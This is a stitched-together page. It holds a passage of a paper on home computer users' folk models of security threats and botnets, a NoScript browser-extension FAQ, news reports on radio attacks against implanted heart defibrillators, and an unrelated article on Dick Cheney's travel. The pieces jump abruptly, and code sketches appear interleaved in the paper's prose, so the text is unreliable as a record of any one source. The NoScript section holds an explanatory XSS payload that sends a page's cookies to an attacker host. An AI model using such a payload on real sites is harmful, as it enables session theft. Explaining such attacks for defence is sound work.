Some respondents believed that there were multiple types of hackers. Most of the time, these respondents would believe that some hackers are the mischievous graffiti-hackers and that other hackers are criminal hackers (using either the burglar or big fish model, but not both). These respondents would then try to make the effort to protect themselves from both types of hacker threats as necessary. It seems that there is some amount of cognitive dissonance that occurs when respondents hear about both mischievous hackers and criminal hackers. There are two ways that respondents resolve this: the simplest way to resolve this is to believe that some hackers are mischievous and other hackers are criminals, and consequently keep the models separate; a more complicated way is to try to integrate the two models into one coherent belief about hackers. This latter option involves a lot of effort making sense of the new folk model that is not as clear or as commonly shared as the mischievous and criminal models. The ‘contractor’ model of hackers is the result of this integration of the two types of hackers.

Computer security experts have been providing security advice to home computer users for many years now. There are many websites devoted to doling out security advice, and numerous technical support forums where home computer users can ask security-related questions. There has been much effort to simplify security advice so regular computer users can easily understand and follow it. However, many home computer users still do not follow this advice, as is evident from the large number of security problems that plague home computers. There is disagreement among security experts as to why this advice isn’t followed. Some experts seem to believe that home users do not understand the security advice, and therefore more education is needed. Others seem to believe that home users are simply incapable of consistently making good security decisions [10]. However, neither explanation accounts for which advice does get followed and which advice does not. The folk models described above begin to provide an explanation of which expert advice home computer users choose to follow, and which advice they ignore. By better understanding why people choose to ignore certain pieces of advice, we can better craft that advice and our technologies to have a greater effect. In Table 3, I list 12 common pieces of security advice for home computer users. This advice was collected from the Microsoft Security at Home website {7}, the CERT Home Computer Security website {8}, and the US-CERT Cyber-Security Tips website {9}; much of this advice is duplicated across websites. It represents the distilled wisdom of many computer security experts. The table then summarizes, for each folk model, whether a given piece of advice is important to follow, helpful but not essential, or not necessary to follow. To me, the most interesting entries indicate when users believe that a piece of security advice is not necessary to follow (labeled ‘xx’ in the table).
These entries show how home computer users apply their folk models to determine for themselves whether a given piece of advice is important. Also interesting are the entries labeled ‘??’; these entries indicate places where users believe that the advice will help with security, but do not see the advice as so important that it must always be followed. Often users will decide that following advice labeled with ‘??’ is too costly in terms of effort or money, and decide to ignore it. Advice labeled ‘!!’ is extremely important, and the respondents feel that it should never be ignored, even if following it is inconvenient, costly, or difficult.

{7}, retrieved July 5, 2009
{8}, retrieved July 5, 2009
{9}, retrieved July 5, 2009

3.1 Anti-Virus Use
Advice 1–3 concerns anti-virus technology: Advice #1 states that anti-virus software should be used; #2 states that the virus signatures need to be constantly updated to be able to detect current viruses; and #3 states that the anti-virus software should regularly scan a computer to detect viruses. All of these are best practices for using anti-virus software. Respondents mostly use their folk models of viruses to make decisions about anti-virus use, for obvious reasons. Respondents who believe that viruses are just buggy software also believe it is not necessary to run anti-virus software. They think they can keep viruses off of their computer by controlling what gets installed; they believe viruses need to be executed manually to infect a computer, and if they never execute one then they don’t need anti-virus software. Respondents with the under-developed folk model of viruses, who refer to viruses as generically ‘bad,’ also do not use anti-virus software. These people understand that viruses are harmful and that anti-virus software can stop them. However, they have never really thought about the specific harms a virus might cause them. Lacking an understanding of the threats and potential harm, they generally find it unnecessary to exert the effort to follow the best practices around anti-virus software. Finally, one group of respondents believe that anti-virus software can help stop hackers. Users with the burglar model of hackers believe that regular anti-virus scans can be important because these burglar-hackers will sometimes install viruses to collect personal information. Regular anti-virus use can help detect these hackers.
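The distinction between advice #1 and advice #2 (having a scanner versus keeping its signatures current) can be made concrete with a toy example. The sketch below uses entirely made-up four-byte signatures; no real anti-virus product works from a table like this, but it shows why a scanner only catches what its database already describes.

```python
# Minimal sketch of signature-based scanning. The signature names and
# byte patterns are hypothetical, invented for illustration.

KNOWN_SIGNATURES = {
    "ToyVirus.A": b"\x58\x35\x4f\x21",   # made-up byte pattern
    "OldWorm.A":  b"\xde\xad\xbe\xef",   # made-up byte pattern
}

def scan(data: bytes, signatures=KNOWN_SIGNATURES):
    """Return the names of all known signatures found in the data."""
    return [name for name, pattern in signatures.items() if pattern in data]

# A file containing an old, known pattern is detected...
infected = b"MZ...program bytes...\xde\xad\xbe\xef...more bytes"
print(scan(infected))        # ['OldWorm.A']

# ...but a brand-new virus with an unrecognized pattern slips through
# until the signature database is updated (advice #2).
new_virus = b"MZ...program bytes...\xca\xfe\xf0\x0d..."
print(scan(new_virus))       # []
```

Regular full scans (advice #3) matter for the same reason: a file that was clean according to last month's database may match a signature added since.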

3.2 Other Security Software
Advice #4 concerns other types of security software: home computer users should run a firewall or a more comprehensive Internet security suite. I think that most of the respondents didn’t understand what this security software did, other than a general notion of providing “security.” As such, no one included security software as an important component of their mental model. Respondents who held the graffiti-hacker or burglar-hacker models believed that this software must help with hackers somehow, even though they didn’t know how, and would suggest installing it. But since they do not understand how it works, they do not consider it of vital importance. This highlights an opportunity for home user education; if these respondents better understood how security software helps protect against hackers, they might be more interested in using and maintaining it. One interesting belief about this software comes from the respondents who believe hackers only go after big fish. For these respondents, security software can serve as a speed bump that discourages hackers from casually breaking into their computer; they don’t care exactly how it works as long as it does something.
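For readers who, like the respondents, have only a vague notion of what a firewall does, a minimal sketch may help: a firewall checks each connection attempt against an ordered rule list and allows or blocks it. The rules and port numbers below are purely illustrative, not taken from any real product.

```python
# Toy model of a personal firewall's core decision. Real firewalls
# match on far more (addresses, protocols, connection state), but the
# first-match-wins rule logic is the essential idea.

RULES = [
    # (direction, port, action); port None matches any port
    ("inbound",  80,   "block"),   # no web server running at home
    ("inbound",  3389, "block"),   # refuse unsolicited remote-desktop attempts
    ("outbound", None, "allow"),   # let the user browse freely
    ("inbound",  None, "block"),   # default-deny everything else inbound
]

def check(direction: str, port: int) -> str:
    """Return 'allow' or 'block' for a connection attempt."""
    for rule_dir, rule_port, action in RULES:
        if rule_dir == direction and (rule_port is None or rule_port == port):
            return action
    return "block"  # fail closed if no rule matches

print(check("inbound", 3389))   # an unsolicited break-in attempt is blocked
print(check("outbound", 443))   # the user visiting a website is allowed
```

The asymmetry in the rules, outbound open and inbound closed by default, is exactly what makes a firewall useful against "break-ins" without getting in the user's way.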

3.3 Email Security
Advice #5 is the only piece of advice about email on my list. It states that you shouldn’t open attachments from people you don’t recognize. Everyone in my sample was familiar with this advice and had taken it to heart. Everyone believed that viruses can be transmitted through email attachments, and therefore not clicking on unknown attachments can help prevent viruses.

3.4 Web Browsing
Advice 6–9 all deals with security behaviors while browsing the web. Advice #6 states that users need to ensure that they only download and run programs from trustworthy sources; many types of malware are spread through downloads. #7 states that users should only browse web-pages from trustworthy sources; there are many types of malicious websites, such as phishing websites, and some websites can spread malware when a visitor’s browser simply executes the JavaScript on the site. #8 states that users should disable scripting like Java and JavaScript in their web browsers; there are often vulnerabilities in these scripting engines, and some malware uses these vulnerabilities to spread. And #9 suggests using good passwords so attackers cannot guess their way into your accounts. Overall, many respondents would agree with most of this advice. However, no one seemed to understand the advice about web scripts; indeed, no one seemed to even understand what a web script was. Advice #8 was largely ignored because it wasn’t understood. Everyone understood the need for care in choosing what to download; downloads were strongly associated with viruses in most respondents’ minds. However, only users with well-developed models of viruses (the Mischief and Support Crime models) believed that viruses can be “caught” simply by browsing web pages. People who believed that viruses were buggy software didn’t see browsing as dangerous because they weren’t actively clicking on anything to run it. While all of the respondents expressed some knowledge of the importance of passwords, few exerted extra effort to make good passwords. Everyone understood that, in general, passwords are important, but they couldn’t explain why. Respondents with the graffiti hacker model would sometimes put extra effort into their passwords so that mischievous hackers couldn’t mess up their accounts.
And respondents who believed that hackers only target big fish thought that passwords could be an effective speed bump to prevent hackers from casually targeting them. Respondents who believed in hackers as contractors to criminals uniformly believed that they were not targets of hackers and were therefore safe. However, they were careful in choosing which websites to do business with; since these hackers targeted web businesses with lots of personal or financial information, these respondents felt it was important to only do business with websites they trusted to be secure.
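The reason "good passwords" resist guessing, which the respondents could not articulate, is simple arithmetic: the number of candidates an attacker must try grows exponentially with password length and character-set size. The guessing rate below is an assumed figure chosen only for illustration.

```python
# Worked example of password search-space growth. The attacker speed
# is an assumption for illustration, not a measured figure.

def candidates(charset_size: int, length: int) -> int:
    """Number of possible passwords of exactly this length."""
    return charset_size ** length

GUESSES_PER_SECOND = 1_000_000_000  # assumed attacker guessing rate

for charset, size in [("lowercase only", 26), ("letters+digits+symbols", 94)]:
    for length in (6, 10):
        n = candidates(size, length)
        seconds = n / GUESSES_PER_SECOND
        print(f"{charset}, length {length}: {n:.2e} candidates "
              f"(~{seconds:.2e} s to try them all)")
```

A six-character lowercase password falls in under a second at this assumed rate, while a ten-character mixed password takes many years; that gap, not any single rule about symbols, is what the advice is really about.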

3.5 Computer Maintenance
Finally, Advice 10–12 concerns computer maintenance. Advice #10 suggests that users make regular backups in case some of their data is lost or corrupted; this is good advice for both security and non-security reasons. #11 states that it is important to keep the system patched with the latest updates to protect against known vulnerabilities that hackers and viruses can exploit. And #12 echoes the old maxim that the most secure machine is one that is turned off. Different models led to dramatically different conclusions about which types of maintenance are important. For example, mischievous viruses and graffiti hackers can cause data loss, so users with those models feel that backups are very important. But users who believe in more criminal viruses and hackers don’t feel that backups are necessary; such hackers and viruses steal information but don’t delete it. Patching is an important piece of advice, since hackers and viruses need vulnerabilities to exploit. Most respondents only experience patches through the automatic updates feature in their operating system or applications. Respondents mostly associated the patching advice with hackers; respondents who felt that they would be a target of hackers also felt that patching was an important tool to stop hackers. Respondents who believed that viruses are buggy software felt that viruses also bring out more bugs in other software on the computer; patching the other software makes it more difficult for viruses to cause problems.
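As a concrete illustration of advice #10, a backup only protects against a mischievous virus if it produces a separate copy the virus cannot also destroy. The minimal sketch below (folder names and paths are illustrative) copies a folder to a timestamped destination, the simplest form of the practice.

```python
# Minimal timestamped-backup sketch; all paths are illustrative.
import shutil
import tempfile
from datetime import datetime
from pathlib import Path

def backup(source: Path, backup_root: Path) -> Path:
    """Copy the source tree into a timestamped folder under backup_root."""
    stamp = datetime.now().strftime("%Y%m%d-%H%M%S")
    dest = backup_root / f"{source.name}-{stamp}"
    shutil.copytree(source, dest)
    return dest

# Demonstrate with temporary folders standing in for real documents.
with tempfile.TemporaryDirectory() as tmp:
    docs = Path(tmp) / "documents"
    docs.mkdir()
    (docs / "taxes.txt").write_text("important data")
    dest = backup(docs, Path(tmp))
    print((dest / "taxes.txt").read_text())
```

In practice the backup root would live on separate media (an external drive or remote storage), since a copy on the same disk can be destroyed by the same virus.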

This study was inspired by the recent rise of botnets as a strategy for malicious attackers. Understanding the folk models that home computer users employ in making security decisions sheds light on why botnets are so successful. Modern botnet software seems designed to take advantage of gaps and security weaknesses in multiple folk models. I begin by listing a number of stylized facts about botnets. Not all of these facts hold for every botnet and every piece of botnet software, but they do hold for many of the recent, large botnets.

1. Botnets attack third parties. When botnet viruses compromise a machine, that machine only serves as a worker. That machine is not the end goal of the attacker. The owner of the botnet intends to use that machine (and many others) to cause problems for third parties.
2. Botnets only want the Internet connection. The only thing the botnet wants from the victim computer is its Internet connection. Botnet software rarely takes up much space on the hard drive, rarely looks at existing data on the hard drive, rarely occupies much memory, and rarely uses much CPU. Nothing that makes the computer unique is important.
3. Botnets don’t directly harm the host computer. Most botnet software, once installed, does not directly cause harm to the machine it is running on. It consumes resources, but often botnet software is configured to only use the resources at times they are otherwise unused (like running in the middle of the night). Some botnets even install patches and software updates so that other botnets cannot also use the computer.
4. Botnets spread automatically through vulnerabilities. Botnets often spread through automated compromises. They automatically scan the internet, compromise any vulnerable computers, and install copies of the botnet software on the compromised computers. No human intervention is required; neither the attacker nor the zombie owner nor the vulnerable computer owner need to be sitting at their computer at the time.
These stylized facts about botnets are not true for all botnets, but hold for many of the current, large, well-known, and well-studied botnets. I believe that botnet software effectively takes advantage of the limited and incomplete nature of the folk models of home computer users. Table 4 illustrates how each model does or does not incorporate the possibility of each of the stylized facts about botnets.

Botnets attack third parties.
None of the hacker models would predict that compromises would be used to attack third parties. Respondents who held the Big Fish or the Contractor mental model believe that, since hackers don’t want anything on their computer, hackers would target other computers and leave theirs alone. Respondents with the Burglar model believe that they might be a target, but only because the hacker wants something that might be on their computer; they would believe that once the hacker either finds what he is looking for, or cannot find anything interesting, the hacker will leave. Respondents with the Graffiti model believe that hacking and vandalizing the computer is the end goal; it would never cross their mind that the computer could then be used to attack third parties. None of the respondents used their virus models to discuss potential third parties either. A couple of respondents with the Viruses are Bad model mentioned that once they got a virus, it might try to “spread.” However, they had no idea how this spreading might happen. Spreading is a form of harm to third parties, but it is not the coordinated and intentional harm that botnets cause. Respondents who employed the other three virus models never mentioned the possibility of spreading beyond their computers. They were mostly focused on what the virus would do to them, not on how it might affect others. And where they did have ideas about how viruses spread, those ideas only involved webpages and email; they don’t run a webpage on their computer, and no one acknowledged that a virus could use their email to send copies out.

Botnets only want the Internet connection.
No one in this study could conceive of a hacker or virus that only wanted the Internet connection of their computer. The three crime-based hacker models (Burglar, Big Fish, and Contractor) all hold that hackers are actively looking for something stored on the computer. All the respondents with these three models believed that their computer had (or might have) some specific and unique information that hackers wanted. Respondents with the Graffiti model believed that computers are a sort of canvas for digital mischief. I would guess that they might accept that botnet owners only want the Internet connection; they already believe there is nothing unique about their computer that makes hackers want to do digital graffiti on it. None of the virus models have anything to say about this fact. Respondents with the Viruses are Bad model and the Buggy Software model didn’t attribute any intentionality to viruses. Respondents with the Mischief and Support Crime models believed viruses were created for a reason, but didn’t seem to consider that a virus might want the computer merely as a platform from which to spread.

Botnets don’t harm the host computer.
This is the one stylized fact on this list that any respondents explicitly mentioned. Respondents with the Support Crime model believe that viruses might try to hide on the computer and not display any outward signs of their presence. Respondents who employ one of the other three virus models would find this strange; to them, viruses always create visible effects. To users with the Mischief model, these visible effects are the main point of the virus! Additionally, the three folk models of hackers that relate to crime all include the idea that a ‘break in’ by hackers might not harm the computer. To these respondents, since hackers are just looking for information, they don’t necessarily want to harm the computer. Respondents who use the Graffiti model would find compromises that don’t harm the computer to be strange, as to them the main purpose of ‘breaking into’ computers is to vandalize them.

Botnets spread automatically.
The idea that botnets spread without human intervention would be strange to most of the respondents. Almost all of them believed that hackers had to be sitting in front of some computer somewhere when they were “breaking into” computers. Indeed, two respondents even asked the interviewer how it was possible to use a computer without being in front of it. Most respondents believed that viruses also required some form of human intervention in order to spread: viruses could be ‘caught’ by visiting webpages, by downloading software, or by clicking on emails, but all of those require someone to actively use the computer. Only one subject (Jack) explicitly mentioned that viruses can “just happen.” Respondents with the Viruses are Bad model understood that viruses could spread, but didn’t know how. These respondents might not be surprised to learn that viruses can spread without human intervention, but probably haven’t thought about it enough for that fact to be salient.

Botnets are extremely cleverly designed: they take advantage of home computer users by operating in a very different manner from the one conceived of by the respondents in this study. The only stylized fact listed above that a sizable number of my respondents would recognize as a property of attacks is that botnets don’t harm the host computer, and not everyone in the study would believe even this; some respondents had a mental model in which not harming the computer wouldn’t make sense. This analysis illustrates why eliminating botnets is so difficult. Many home computer users probably hold folk models similar to those of the respondents in this study. If so, botnets look very different from the threats these users envision; because they do not see botnets as a potential threat, they do not take appropriate steps to protect themselves.

Home computer users conceptualize security threats in multiple ways, and consequently make different decisions depending on which conceptualization they hold. In my interviews, I found four distinct ways of thinking about malicious software as a security threat: the ‘viruses are bad,’ ‘buggy software,’ ‘viruses cause mischief,’ and ‘viruses support crime’ models. I found four more distinct ways of thinking about malicious computer users as a threat: thinking of malicious others as ‘graffiti artists,’ ‘burglars,’ ‘internet criminals who target big fish,’ and ‘contractors to organized crime.’

I did not use a generalizable sampling method, so while I can describe a number of different folk models, I cannot estimate how prevalent each model is in the population. Such estimates would be useful in understanding nationwide vulnerability, but I leave them to future work. Nor can I say whether my list of folk models is exhaustive — there may be more models than I describe — but it does represent the opinions of a variety of home computer users. Indeed, the snowball sampling method increases the chances of interviewing users with similar folk models despite the demographic heterogeneity of my sample.

Previous literature [12, 15] described some basic security beliefs held by non-technical users; I provide structure to these findings by showing how home computer users group such beliefs into semi-coherent mental models. My primary contribution is an understanding of why users strictly follow some security advice from computer security experts while ignoring other advice. This illustrates one major problem with security education efforts: they focus on practical, actionable advice but do not adequately explain the threats that home computer users face. Without an understanding of the threats, home computer users intentionally choose to ignore advice that they don’t believe will help them.
Security education efforts should focus not only on recommending what actions to take, but also on why those actions are necessary. Following the advice of Kempton [19], security experts should not evaluate these folk models on the basis of correctness, but rather on how well they meet the needs of the folk that possess them. Likewise, when designing new security technologies, we should not attempt to force users into a more ‘correct’ mental model; rather, we should design technologies that encourage users with limited folk models to be more secure. Effective security technologies need to protect the user from attacks, but also to expose potential threats to the user in a way the user understands, so that he or she is motivated to use the technology appropriately.

I appreciate the many comments and help throughout the whole project from Jeff MacKie-Mason, Judy Olson, Mark Ackerman, and Brian Noble. Tiffany Vienot was also extremely helpful in clarifying the explanation of my methodology. This material is based upon work supported by the National Science Foundation under Grant No. CNS 0716196.

[1] A. Adams and M. A. Sasse. Users are not the enemy. Communications of the ACM, 42(12):40–46, December 1999.
[2] R. Anderson. Why cryptosystems fail. In CCS ’93: Proceedings of the 1st ACM conference on Computer and communications security, pages 215–227. ACM Press, 1993.
[3] F. Asgharpour, D. Liu, and L. J. Camp. Mental models of computer security risks. In Workshop on the Economics of Information Security (WEIS), 2007.
[4] P. Bacher, T. Holz, M. Kotter, and G. Wicherski. Know your enemy: Tracking botnets. From the Honeynet Project, March 2005.
[5] P. Barford and V. Yegneswaran. An inside look at botnets. In Special Workshop on Malware Detection, Advances in Information Security. Springer-Verlag, 2006.
[6] J. L. Camp. Mental models of privacy and security. Available at, August 2006.
[7] L. J. Camp and C. Wolfram. Pricing security. In Proceedings of the Information Survivability Workshop, 2000.
[8] A. Collins and D. Gentner. How people construct mental models. In D. Holland and N. Quinn, editors, Cultural Models in Language and Thought. Cambridge University Press, 1987.
[9] R. Contu and M. Cheung. Market share: Security market, worldwide 2008. Gartner Report, June 2009.
[10] L. F. Cranor. A framework for reasoning about the human in the loop. In Usability, Psychology, and Security Workshop. USENIX, 2008.
[11] R. D’Andrade. The Development of Cognitive Anthropology. Cambridge University Press, 2005.
[12] P. Dourish, R. Grinter, J. D. de la Flor, and M. Joseph. Security in the wild: User strategies for managing security as an everyday, practical problem. Personal and Ubiquitous Computing, 8(6):391–401, November 2004.
[13] D. M. Downs, I. Ademaj, and A. M. Schuck. Internet security: Who is leaving the ’virtual door’ open and why? First Monday, 14(1-5), January 2009.
[14] R. E. Grinter, W. K. Edwards, M. W. Newman, and N. Ducheneaut. The work to make a home network work. In Proceedings of the 9th European Conference on Computer Supported Cooperative Work (ECSCW ’05), pages 469–488, September 2005.
[15] J. Gross and M. B. Rosson. Looking for trouble: Understanding end user security management. In Symposium on Computer Human Interaction for the Management of Information Technology (CHIMIT), 2007.
[16] C. Herley. So long, and no thanks for all the externalities: The rational rejection of security advice by users. In Proceedings of the New Security Paradigms Workshop (NSPW), September 2009.
[17] P. Johnson-Laird, V. Girotto, and P. Legrenzi. Mental models: a gentle guide for outsiders. Available at, 1998.
[18] P. N. Johnson-Laird. Mental models in cognitive science. Cognitive Science: A Multidisciplinary Journal, 4(1):71–115, 1980.
[19] W. Kempton. Two theories of home heat control. Cognitive Science: A Multidisciplinary Journal, 10(1):75–90, 1986.
[20] A. J. Kuzel. Sampling in qualitative inquiry. In B. Crabtree and W. L. Miller, editors, Doing Qualitative Research, chapter 2, pages 31–44. Sage Publications, Inc., 1992.
[21] J. Markoff. Attack of the zombie computers is a growing threat, experts say. New York Times, January 7 2007.
[22] D. Medin, N. Ross, S. Atran, D. Cox, J. Coley, J. Proffitt, and S. Blok. Folkbiology of freshwater fish. Cognition, 99(3):237–273, April 2006.
[23] M. B. Miles and M. Huberman. Qualitative Data Analysis: An Expanded Sourcebook. Sage Publications, Inc., 2nd edition, 1994.
[24] A. J. Onwuegbuzie and N. L. Leech. Validity and qualitative research: An oxymoron? Quality and Quantity, 41:233–249, 2007.
[25] D. Russell, S. Card, P. Pirolli, and M. Stefik. The cost structure of sensemaking. In Proceedings of the INTERACT ’93 and CHI ’93 conference on Human factors in computing system, 1993.
[26] Trend Micro. Taxonomy of botnet threats. Whitepaper, November 2006.

This appendix contains samples of data matrix displays that were developed during the data analysis phase of this project.

Rick Wash
email : wash [at] msu [dot] edu


Q: Why can I sometimes see about:blank and/or wyciwyg: entries? What scripts are causing this?
A:   about:blank is the common URL designating empty (newly created) web documents. A script can “live” there only if it has been injected (with document.write() or DOM manipulation, for instance) by another script, which must have its own permission to run. This usually happens when a master page creates (or statically contains) an empty sub-frame (automatically addressed as about:blank) and then populates it using scripting. Hence, if the master page is not allowed, no script can be placed inside the about:blank empty page and its “allowed” privilege is void. Given the above, the risks in keeping about:blank allowed should be very low, if any. Moreover, some Firefox extensions need it to be allowed for scripting in order to work. Sometimes, especially on partially allowed sites, you may also see a wyciwyg: entry. It stands for “What You Cache Is What You Get”, and identifies pages whose content is generated by JavaScript code through functions like document.write(). If you can see such an entry, you already allowed the script generating it, hence the above about:blank trust discussion applies to this situation as well.
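The injection path described in the answer can be sketched as a tiny page. This is a hypothetical illustration (not code from NoScript itself): a master page with an empty about:blank sub-frame, populated by the parent page’s own script.

```html
<!-- Hypothetical master page: its own domain must be allowed for this script to run. -->
<iframe id="empty-frame" src="about:blank"></iframe>
<script>
  // The about:blank frame has no scripts of its own; it only receives content
  // that the (allowed) parent page pushes into it via DOM access.
  var doc = document.getElementById("empty-frame").contentDocument;
  doc.open();
  doc.write("<p>Injected by the parent page's script.</p>");
  doc.close();
</script>
```

If NoScript blocks the parent page’s domain, this script never executes, so nothing can appear inside the about:blank frame; this is why keeping about:blank itself allowed is low-risk.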

Q: Why should I allow JavaScript, Java, Flash and plugin execution only for trusted sites?
A:   JavaScript, Java and Flash, though very different technologies, have one thing in common: they execute code coming from a remote site on your computer. All three implement some kind of sandbox model limiting the activities remote code can perform: e.g., sandboxed code shouldn’t read or write your local hard disk nor interact with the underlying operating system or external applications. Even if the sandboxes were bulletproof (not the case, read below) and even if you or your operating system wrapped the whole browser in another sandbox (e.g. IE7+ on Vista or Sandboxie), the mere ability to run sandboxed code inside the browser can be exploited for malicious purposes, e.g. to steal important information you store or enter on the web (credit card numbers, email credentials and so on) or to “impersonate” you, e.g. in fake financial transactions, launching “cloud” attacks like Cross Site Scripting (XSS) or CSRF, with no need to escape your browser or gain privileges higher than a normal web page. This alone is reason enough to allow scripting on trusted sites only. Moreover, many security exploits aim at “privilege escalation”, i.e. exploiting an implementation error in the sandbox to acquire greater privileges and perform nasty tasks like installing trojans, rootkits and keyloggers.

This kind of attack can target JavaScript, Java, Flash and other plugins as well:

  1. JavaScript looks like a very precious tool for bad guys: most of the browser-exploitable vulnerabilities fixed to date were ineffective if JavaScript was disabled. Maybe the reason is that scripts are easy to test and search for holes, even if you’re a newbie hacker: everybody and his brother believes he’s a JavaScript programmer :P
  2. Java has a better history, at least in its “standard” incarnation, the Sun JVM. There have been viruses written for the Microsoft JVM instead, like the ByteVerifier.Trojan. Anyway, the Java security model allows signed applets (applets whose integrity and origin are guaranteed by a digital certificate) to run with local privileges, i.e. just as if they were regular installed applications. This, combined with the fact that there are always users who, faced with a warning like “This applet is signed with a bad/fake certificate. You DON’T want to execute it! Are you so mad as to execute it anyway? [Never!] [Nope] [No] [Maybe]”, will search, find and hit the “Yes” button, has brought some bad reputation even to Firefox (notice that the article is quite lame, but as you can imagine it had much echo).
  3. Flash used to be considered relatively safe, but since its usage became so widespread, severe security flaws have been found at a higher rate. Flash applets have also been exploited to launch XSS attacks against the sites hosting them.
  4. Other plugins are harder to exploit, because most of them don’t host a virtual machine like Java and Flash do, but they can still expose holes like buffer overruns that may execute arbitrary code when fed specially crafted content. Recently we have seen several of these plugin vulnerabilities, affecting Acrobat Reader, Quicktime, RealPlayer and other multimedia helpers.

Please notice that usually (95% of the time) none of the aforementioned technologies is affected by publicly known and still unpatched exploitable problems, but this is exactly the point of NoScript: preventing the exploitation of security holes not yet known, because when they are discovered it may be too late ;) The most effective way is disabling the potential threat on untrusted sites.
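The “cloud attack” scenario mentioned above can be made concrete with a minimal sketch of the kind of script an attacker injects via XSS. Everything here is hypothetical (the attacker.example domain and the function name are invented for illustration); it only shows why letting untrusted code run inside a page is dangerous even with a perfect sandbox.

```javascript
// Hypothetical XSS payload sketch: read data the page can see and smuggle it
// out through an ordinary image request, which no sandbox forbids.
function buildExfilUrl(secret) {
  // Encode the stolen value into a URL on a server the attacker controls.
  return "https://attacker.example/log?c=" + encodeURIComponent(secret);
}

// In a real attack the injected script would run inside the victim page as:
//   new Image().src = buildExfilUrl(document.cookie);
// Here we just show the URL such a payload would request.
console.log(buildExfilUrl("session=abc123"));
```

Nothing in this sketch escapes the sandbox: the payload only uses ordinary page-level abilities (reading cookies, loading an image). That is why NoScript’s whitelist approach blocks the script from running at all rather than trying to contain it.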

Q:  What is a trusted site?
A:  A “trusted site” is a site whose owner is well identifiable and reachable, so I have someone to sue if he hosts malicious code which damages or steals my data.* If a site qualifies as “trusted”, there’s no reason why I shouldn’t allow JavaScript, Java or Flash. If some content is annoying, I can disable it with AdBlock. What I’d like to stress here is that “trust” is not necessarily a technical matter. Many online banking sites require JavaScript and/or Java, even in contexts where these technologies are absolutely useless and abused: for more than 2 years I’ve been asking my bank to correct a very stupid JavaScript bug preventing login from working with Firefox. I worked around this bug writing an ad hoc bookmarklet, but I’m not sure the average Joe user could.

So, should I trust their mediocre programmers with my security? Anyway, if something nasty happens to my online bank account because their site is unsafe, I’ll sue them to death (or better, I’ll let the world know) until they refund me. So you may say “trust” equals “accountability”. If you’re more on the technical side and you want to examine the JavaScript source code before allowing a site, you can help yourself with JSView.

* You may ask: what if a site I really trust gets compromised? Will I get infected as well because I’ve got it in my whitelist, ending up having to sue as you said? No, most probably you won’t. When a respectable site gets compromised, 99.9% of the time the malicious scripts are hosted on a different domain which is likely not in your whitelist, and just get included by the pages you trust. Since NoScript blocks 3rd party scripts which have not been explicitly whitelisted themselves, you’re still safe, with the additional benefit of an early warning :)

Hacking attacks can turn off heart monitors
by Richard Thurston / 12th March 2008

American researchers have proven it’s possible to maliciously turn off individuals’ heart monitors through a wireless hacking attack. Many thousands of people across the world have the monitors, medically known as implantable cardiac defibrillators (ICDs), installed to help their hearts beat regularly. ICDs treat abnormal heart conditions; more recent models also incorporate the abilities of a Pacemaker. Their function is to speed up a heartbeat which is too slow, or to deliver an electrical shock to a heart which is beating too quickly. According to the research by the Medical Device Security Center – which is backed by the Harvard Medical School among others – hackers would be able to intercept medical information on the patient, turn off the device, or, even worse, deliver an unnecessary electrical shock to the patient.

The hack takes advantage of the fact the ICD possesses a radio which is designed to allow reprogramming by a hospital doctor. The ICD’s radio signals are not encrypted, the Security Center said. The Security Center demonstrated the hack on an ICD made by Medtronic using a PC, radio hardware and an antenna. The ICD was not in a patient at the time. The research is detailed in a report released today. The report reveals that a hacker could “render the ICD incapable of responding to dangerous cardiac events. A malicious person could also make the ICD deliver a shock that could induce ventricular fibrillation, a potentially lethal arrhythmia.”

The Security Center says manufacturers of ICDs could implement several measures to prevent the threat. These include making the IMD produce an audible alert when an unauthorised party tries to communicate with it. It also suggests employing cryptography to provide secure authentication for doctors. The researchers added that the risk facing patients is negligible. “We believe the risk to patients is low and that patients should not be alarmed,” it said in the report. “We do not know of a single case where an IMD patient has ever been harmed by a malicious security attack.” It added that hackers would need to be physically close to their intended victim and would need sophisticated equipment. The kit used in the demonstrated attack cost $30,000. The researchers omitted their methodology from the paper to help prevent such an attack ever happening, they said. Medtronic said the chance of such an attack is “extremely low”. Future versions of its IMDs, which will send radio signals ten metres, will incorporate stronger security, it told reporters.


“Manufacturers of medical devices have a duty to patients to produce safe products.  In lawsuits against Medtronic prepared by Lieff Cabraser, our clients allege that Medtronic misrepresented the safety of the Sprint Fidelis lead. Hundreds of injuries linked to Sprint Fidelis heart defibrillator wires had been reported to the FDA as of the end of 2006. The high and early failure rate of Medtronic Sprint Fidelis leads was also reported in a medical journal in 2006. Yet, Medtronic failed to issue a recall and instead continued to sell the devices.”

On the Road With Cheney
by Deb Riechmann  /  March 31, 2008

He travels with a green duffel bag stuffed with nonfiction books about military campaigns and political affairs. He has an iPod and noise-canceling earphones to listen to oldies and some country-western. Oh, and he has two planes, including a C-17 military transport with a 40-foot silver trailer in its belly for his privacy and comfort, and round-the-clock bodyguards and medical staff. Aides pack the Diet Sprite — a Cheney favorite — keep the decaffeinated lattes flowing, and tune the tube to Fox News. Vice President Cheney is not your regular road warrior. Mr. Cheney returned Wednesday from a 10-day trip to Iraq, Oman, Afghanistan, Saudi Arabia, Israel, the Palestinian territory, and Turkey. The rigors of travel and ever-present security concerns make sightseeing difficult. Still, he squeezed in a little on his final stop in Istanbul. The vice president, his wife, Lynne, and daughter, Liz, saw Topkapi Palace, seat of the Ottoman sultans for almost 400 years. For all his globe-trotting, Mr. Cheney had never been to Istanbul, home of the Bosphorus Bridge that links Europe and Asia.

More often, Mr. Cheney’s days on the road are spent holed up on planes, helicopters, hotel rooms and stuffy government buildings. They are long, grueling days. His staffers say they have to run fast to keep up with a schedule that seems especially rigorous for a 67-year-old man who has had four heart attacks. Like the gadget inside his chest that makes sure his heart is beating in sync, Mr. Cheney paces himself. “Because he’s been doing it for so long, he has a pretty good sense of what’s important and what’s not important,” a former administration official, Liz Cheney, said. “He keeps his perspective, doesn’t let the little things get to him, you know. They sort of roll off, and he keeps his sense of humor,” she said in Saudi Arabia.

Pacemakers can be hijacked by radio  /  22 March 2008

It gives new meaning to the term “heart attack”.

Last week researchers led by William Maisel at Harvard University used a commercially available radio transmitter to hijack the software on a device that acts as both a heart pacemaker and defibrillator. The device was not implanted in anyone, but the experiment raises the prospect of hackers being able to disrupt a person’s heartbeat or stealthily administer damaging shocks. Is the threat of a hacker-instigated heart attack imminent? “The chances of someone being harmed by malicious reprogramming of their device is remote,” says Maisel. However, implanted drug pumps and neurostimulators, which deliver electrical pulses to the brain, could be more vulnerable to such attacks in future as they increasingly have wireless capabilities built in.

William H. Maisel, M.D., M.P.H.…
email : wmaisel [at] bidmc.harvard [dot] edu

